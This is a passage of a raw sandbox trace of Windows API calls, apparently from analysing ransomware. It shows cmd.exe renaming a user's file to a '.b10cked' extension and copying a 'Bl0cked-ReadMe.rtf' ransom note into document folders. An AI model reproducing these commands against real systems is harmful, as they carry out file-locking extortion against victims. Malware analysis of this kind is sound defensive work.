lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv", lpFilePart=0x0) returned 0x50 [0232.740] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\g ol7oxwe18lexod.csv")) returned 0x20 [0232.740] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\g ol7oxwe18lexod.csv"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\g ol7oxwe18lexod.csv.b10cked"), dwFlags=0x3) returned 1 [0232.740] FindClose (in: hFindFile=0x4c2308 | out: hFindFile=0x4c2308) returned 1 [0232.741] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2cef28 | out: _Buffer=" 1") returned 9 [0232.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.741] GetFileType (hFile=0x7) returned 0x2 [0232.741] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.741] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceeb4 | out: lpMode=0x2ceeb4) returned 1 [0232.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.741] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ceee8 | out: lpConsoleScreenBufferInfo=0x2ceee8) returned 1 [0232.741] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.742] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2cef28 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.742] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2cef0c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2cef0c*=0x1a) returned 1 [0232.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.742] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.742] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.742] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.742] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.742] SetConsoleInputExeNameW () returned 0x1 [0232.743] GetConsoleOutputCP () returned 0x1b5 [0232.743] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.743] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.743] exit (_Code=0) Process: id = "618" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d40" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34455 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34456 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34457 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34458 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 34459 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34460 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34461 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34462 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34463 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 34464 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34831 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34832 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34833 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34834 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 34835 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 34836 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34837 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34838 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34839 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34840 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34841 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34842 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34843 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34844 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34845 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34846 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34847 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34848 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 34849 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 34850 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 34851 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 34852 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 34853 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 34854 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 858 os_tid = 0x370 [0232.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf914 | out: lpSystemTimeAsFileTime=0x2cf914*(dwLowDateTime=0xbe319c40, dwHighDateTime=0x1d440a9)) [0232.599] GetCurrentProcessId () returned 0x9b8 [0232.599] GetCurrentThreadId () returned 0x370 [0232.599] GetTickCount () returned 0x3ffb2 [0232.599] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf90c | out: lpPerformanceCount=0x2cf90c*=28938833893) returned 1 [0232.600] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0232.600] __set_app_type (_Type=0x1) [0232.600] __p__fmode () returned 0x76b331f4 [0232.600] __p__commode () returned 0x76b331fc [0232.600] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0232.600] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0232.600] GetCurrentThreadId () returned 0x370 [0232.600] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x370) returned 0x38 [0232.600] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.600] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0232.600] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.601] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.601] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf8a4 | out: phkResult=0x2cf8a4*=0x0) returned 0x2 [0232.601] VirtualQuery (in: lpAddress=0x2cf8db, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.601] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.601] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0232.601] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.601] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0232.601] GetConsoleOutputCP () returned 0x1b5 [0232.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.601] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0232.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.602] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.602] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.602] GetEnvironmentStringsW () returned 0x3701d8* [0232.602] FreeEnvironmentStringsW (penv=0x3701d8) returned 1 [0232.602] GetEnvironmentStringsW () returned 0x3701d8* [0232.602] FreeEnvironmentStringsW (penv=0x3701d8) returned 1 [0232.602] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce814 | out: phkResult=0x2ce814*=0x40) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x0, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x1, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x1, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x0, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x40, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x40, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x40, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegCloseKey (hKey=0x40) returned 0x0 [0232.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce814 | out: phkResult=0x2ce814*=0x40) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x40, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x1, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x1, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x0, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x9, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x9, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x9, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegCloseKey (hKey=0x40) returned 0x0 [0232.603] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c0 [0232.603] srand (_Seed=0x5b8863c0) [0232.603] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0232.603] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0232.604] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.604] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0232.604] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.604] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.604] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.604] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.604] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.604] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.604] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.604] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.604] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0232.604] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.605] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.605] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.605] GetEnvironmentStringsW () returned 0x372328* [0232.605] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0232.605] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.605] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.605] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.605] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0232.605] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.605] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0232.605] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.605] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.605] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.605] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.605] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.605] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5e0, lpFilePart=0x2cf5dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf5dc*="Desktop") returned 0x18 [0232.605] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.605] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf35c | out: lpFindFileData=0x2cf35c) returned 0x370068 [0232.606] FindClose (in: hFindFile=0x370068 | out: hFindFile=0x370068) returned 1 [0232.606] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf35c | out: lpFindFileData=0x2cf35c) returned 0x370068 [0232.606] FindClose (in: hFindFile=0x370068 | out: hFindFile=0x370068) returned 1 [0232.606] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf35c | out: lpFindFileData=0x2cf35c) returned 0x370068 [0232.606] FindClose (in: hFindFile=0x370068 | out: hFindFile=0x370068) returned 1 [0232.606] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.606] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.606] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.606] GetEnvironmentStringsW () returned 0x372b48* [0232.607] FreeEnvironmentStringsW (penv=0x372b48) returned 1 [0232.607] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.607] GetConsoleOutputCP () returned 0x1b5 [0232.607] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.607] GetUserDefaultLCID () returned 0x409 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf720, cchData=128 | out: lpLCData="0") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf720, cchData=128 | out: lpLCData="0") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf720, cchData=128 | out: lpLCData="1") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.608] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.610] GetConsoleTitleW (in: lpConsoleTitle=0x360918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.610] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.610] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.610] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.610] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.611] _wcsicmp (_String1="type", _String2=")") returned 75 [0232.611] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0232.611] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0232.611] _wcsicmp (_String1="IF", _String2="type") returned -11 [0232.611] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0232.611] _wcsicmp (_String1="REM", _String2="type") returned -2 [0232.611] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0232.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.616] 